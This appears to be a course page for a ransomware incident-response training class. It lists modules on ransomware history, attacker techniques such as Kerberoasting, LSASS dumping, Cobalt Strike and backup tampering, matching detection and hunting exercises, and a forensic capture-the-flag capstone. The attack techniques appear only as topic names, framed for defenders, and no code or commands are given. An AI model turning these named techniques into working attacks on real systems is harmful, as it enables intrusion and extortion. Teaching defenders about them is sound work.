Ransomware for Incident Responders
Ransomware attackers have become more sophisticated, and their techniques constantly evolve. More than ever, organizations are at risk of losing their data and information to these attacks, which can lead to revenue losses, reputational damage, theft of employee time and productivity, and inability to function normally. The Ransomware for Incident Responders course teaches how to deal with the specifics of ransomware, from initial detection to incident response and postmortem analysis. The class features a hands-on approach to learning by applying real-world data exercises to train students on how to prepare for, detect, hunt, respond to, and deal with the aftermath of ransomware.(Online classes available)
Course Content
Module1: Ransomware Incident Response Fundamentals
The Ransomware for Incident Responders course begins with a review of ransomeware’s history. We begin with the story of the first-known ransomware attack and work our way to the current-day threats that loom above our industry. Our inner-connected lives, not to mention livelihoods, are at risk everyday thanks to the advent of Human Operated Ransomware (HumOR) and Ransomware-as-a-Service (RaaS). You will better your understanding of ransomware as we deep-dive into the roles, processes, communication methods, and activities related to these threats.
Exercises
- Install the customized FOR528 Windows and SIFT VMs, configuring them as required for detailed log review and malware analysis
- Utilize a ransomware “builder” to generate a customized ransomware encryptor payload along with a decryption tool. You will run the ransomware payload you generate, review the encrypted files, and then use the decryption tool to decrypt the data.
- Review forensic artifacts collected from a compromised environment and then parse the data using KAPE. Utilize Timeline Explorer to review data parsed via KAPE while focusing on Master File Table (MFT), System Resource Usage Monitor (SRUM), Shellbags, Shimcache, and Windows Event Log artifacts.
- Hunt data within the TimeSketch interface while focusing on how analysis of MFT, SRUM, Shellbags, Shimcache, and Windows Event Log scales when moving from manual analysis from the previous lab to at-scale analysis
- Learn the ins-and-outs of the most common interface associated with Elasticsearch, Logstash, and Kibana (ELK) stacks, Kibana, while adapting skills acquired in previous labs
Topics
- Course virtual machines
-
- Overview & setup
- Custom attack scenarios overview.
-
- “BlueLocker” Ransomware group
- “Balrog” Ransomware group
- Ransomware evolution and history
-
- First-recognize ransomware attack
- Lockers and single-machine encryption payloads
- Human-Operated Ransomware (HumOR)
- Ransomware-as-a-Service (RaaS)
-
- RaaS model, hierarchies, and roles
- RaaS builders and generators
- RaaS dashboards
- Install Access Brokers (IABs)
-
- Methods of access
- Darknet marketplaces
- Victim access: Selling vs. Buying
- Ransomware operators
-
- Group evolution over time
- Types of extortion
- Data leak sites and psychological pressures
- Darkweb forum communications
- Forensic Artifact Collection
-
- Review artifacts collected by the Kroll Artifact Parser and Extractor (KAPE)
- Process/parse collected artifacts using KAPE
- Review the output of parsed artifacts to understand better the tools and methodologies leveraged to parse the forensic data for review
- Incident Response processes and their application to ransomware
-
- Dynamic Approach to Incident Response (DAIR) model
- Phases of a typical ransomware campaign
- Windows Forensic Artifacts
-
- Event Logs, Shellbags, Shimcache, SRUM, and more
- Using Timeline Explorer to analyze CSV files output by common parsing tools
- Artifact collection tools
- Acquiring forensic artifacts
- Analysis at scale
-
- Using Velociraptor to collect in bulk
- Log augmentation via Sysmon
- Log auditing review via Log-MD
- Log aggregators/SIEMs and file names
- Analysis GUIs
-
- TimeSketch
- Kibana
Module2 : Ransomware Modus Operandi
Overview
Ransomware incidents are not especially unique. We Incident Responders see the same Tactics, Techniques, and Procedures (TTPs) over and over& So let’s learn how to detect them!
Section two transitions from foundational knowledge to covering the initial stages of a ransomware campaign attack cycle. We begin by covering Initial Access, Execution, Defense Evasion, and scripting engine abuse. Most ransomware cases involve actors leveraging scripting engines such as PowerShell, Batch scripts, JavaScript, Visual Basic Scripting, and more.
Exercises
- Hunting malicious RDP activity to identify initial infection vectors and internal-to-internal lateral movement
- Identify successful phishing attacks via hunting Microsoft Office applications as parent processes, zip files opened natively in Windows, zip file credential read operations, Outlook downloading/executing files, and review of the Microsoft Trust Center
- Learn to analyze encoded and obfuscated PowerShell payloads
- Identify lateral movement via mechanisms such as RDP, PsExec, WMI, and Cobalt Strike
Topics
The phases of a ransomware attack campaign
- Initial Access
- Execution
- Defense Evasion
- Persistence
- Attacks against Active Directory
- Privilege Escalation
- Credential Access
- Lateral Movement
The following sections include in-depth details on the tools and processes noted along with methods for detection and hunting:
- Initial Access
- Top 3 IV initial access methods: RDP, Phishing, and Software Vulnerabilities
- Phishing vectors
- Malware infection vs. credential harvesting
- Malicious attachments such as MalDocs
- Review of our Email Gateway File Block List (linked)
- Malicious links and how to analyze them
-
- Remote Desktop Protocol (RDP)
- Import Windows Event Logs
- Identifying malicious RDP activity
- Malware-as-a-Service (Maas)
-
Software exploits / Vulnerabilities
- Zero-day vs. Common Vulnerabilities and Exposures (CVEs)
- Example CVEs targeted and exploited in the wild
- Darknet forum discussions RE: know vulnerabilities
- Remote Desktop Protocol (RDP)
- Execution and Defense Evasion
- Threat actor tooling:
- Free and Open-Source (FOSS)
- Native scripting engines
- Living Off the Land Binaries and Scripts (LOLBAS)
- Commercial tooling for adversary emulation (e.g. Cobalt Strike)
- Malware-as-a-Service (MaaS)
- Security service/mechanism bypass methods
- Native execution methods
- Windows Management Instrumentation (WMI) attacks
- Scripting engine abuse
- PowerShell
- Batch scripts
- JavaScript scripts
- Visual Basic Scripting
- PowerShell logging and advanced analysis
- Associated Windows Event Logs and enabling them
- PowerShell parameters and their purposes
- Threat actor tooling:
- Persistence
- Common C2 methods
- Remote Monitoring and Management (RMM)
- Post-exploit frameworks (e.g. Cobaltstrike, Empire, PowerSploit, etc.)
- Account creation
- Boot / Logon auto-start locations
- Service installations
- Scheduled tasks
- WMI event subscriptions
-
Active Directory (AD) Attacks
- AD Enumeration
- Bloodhound & SharpHound
- Kerberoasting
- AS-REP Roasting
- DCSync attacks
- Golden ticket attacks
- Privilege Escalation and Credential Access
- Commonly targeted accounts
- Methods by which accounts are targeted
- User Account Control (UAC) bypass methods
- Local Security Authority Server Service (LSASS) access and dumping
- NTDS.dit attacks
- Alternate credentials attacks
-
-
- Attacks on passwords stored in browsers and password management tools
- Session sniffers and extractors
- All-in-one solutions seen commonly (e.g. WinPwn)
-
- Lateral Movement
- RDP and RDP cached bitmap analysis
- Server Message Block (SMB) lateral movement
- Named pipe utilization and relation to service installs
- SysInternals PsExec
- Windows Remote Management (WinRM)
- Attacks against ESXi
Module3: Advanced Ransomware Concepts
Our next section focuses on attacks against Microsoft’s Active Directory (AD). Ransomware operators love to attack AD, so we will break down the various ways in which they take advantage of poor AD configurations to escalate privileges and access credentials.
Exercises
- Hunt and identify data access and potential exfiltration via hunting and pivoting through NTFS metadata (NTFS, UsnJrnl, etc.), manual parsing of acquired artifacts, Timeline Explorer, TimeSketch, and Kibana
- Decoding and analysing Cobalt Strike payloads including PowerShell shellcode injectors and “stageless” beacon EXE and DLL loaders
- Detecting the threat actor’s toolbox via hunting methods such as detecting PSTools, renamed executables, common directories, and more
Topics
- Data Access
-
- Reporting and legal considerations
- Network share enumeration and access
- Deleted file and file knowledge
- File and folder access
- Registry analysis
- Tool-specific analysis
- Data Exfiltration
-
- Archive creation
- Data staging
- Creation/use of .txt and .csv files
- Data exfiltration routes
- Network log and NetFlow review
- Backup and Recovery tampering
-
- Volume Shadow Service attacks
- Boot Configuration Data, Windows Boot Status Policy, and Windows Backup attacks
- Event log clearing
- Payload Deployment
-
- Common deployment tools and methods
- Deployment via PsExec
- Deployment via WMIC
- Deployment via BITS
- Encryption and Decryptors
-
- Encryption key types
- Overwrite vs. Copy/Delete encryption methods
- Ransom notes
- Encryption mechanism source code review
- Decryptors
- Cobalt Strike (CS)
-
- Threat actor access and utilization
- CS architecture and components
- Malleable C2 profiles
- Commands and cheat sheets
- Detection methods
- Payload decoding tools and methods
-
Dealing with an Active Threat
- Time considerations
- Informed consent
- Departments and roles that need to be involved
- “Going Dark” a.k.a. Cutting Internet connectivity
- Securing critical services and functions
- Ransomware Payments
-
- Cons regarding payment
- Pros regarding payment
- Threat actor communications and negotiations
- Hunting Ransomware Operators. Techniques to identify:
-
- Malicious RDP connectivity
- Process name and path anomalies
- Rogue/malicious executables
- PowerShell encoded commands
- Malicious activity in Antivirus logs
- Malicious activity involving environment variables
Module4: Course Capture the Flag Challenge
Overview
Whether your organization would need to begin all artifact collection and parsing post-incident, or you have augmented your data logging and take advantage of a full-fledged SIEM, the methods we cover in our Capstone will help you relate to your organization’s methods and capabilities.
Exercises
- A full day of analyzing parsed forensic artifacts and logs to answer questions common in every ransomware incident using two separate scenarios
Topics
- Digital Forensics Capstone
- Analysis
-
-
- Review parsed artifact and log data for Scenario 1 using TimeSketch
- Review parsed artifact and log data for Scenario 2 using Kibana
- Examine Windows Event logs, Sysmon data, artifacts of program execution, registry hive files, and more
- Follow the threat actor’s actions from initial infection vector through encryptor payload deployment and execution
- Identify the tools, scripts, tactics, and processes used throughout each major phase of each attack campaign
-
- Answer the questions every organization wants answered following a ransomware event, such as:
- How did the actors get into the network?
- What data, if any, were the actors able to access?
- Were the actors able to steal (i.e. exfiltrate) any data?
- Which systems were impacted by the overall campaign, including the encryption payload itself?
- And more!
International Student Fee: 950$
Job Interview Preparation (Soft Skills Questions & Answers)
- Tough Open-Ended Job Interview Questions
- What to Wear for Best Job Interview Attire
- Job Interview Question- What are You Passionate About?
- How to Prepare for a Job Promotion Interview
Your FREE eLEARNING Courses (Click Here)
Internships, Freelance and Full-Time Work opportunities
- Join Internships and Referral Program (click for details)
- Work as Freelancer or Full-Time Employee (click for details)
Flexible Class Options
- Week End Classes For Professionals SAT | SUN
- Corporate Group Trainings Available
- Online Classes – Live Virtual Class (L.V.C), Online Training
Related Courses
Advanced Incident Response, Threat Hunting, and Digital Forensics
Enterprise-Class Incident Response & Threat Hunting
Enterprise Memory Forensics In-Depth
Advanced Network Forensics- Threat Hunting, Analysis, and Incident Response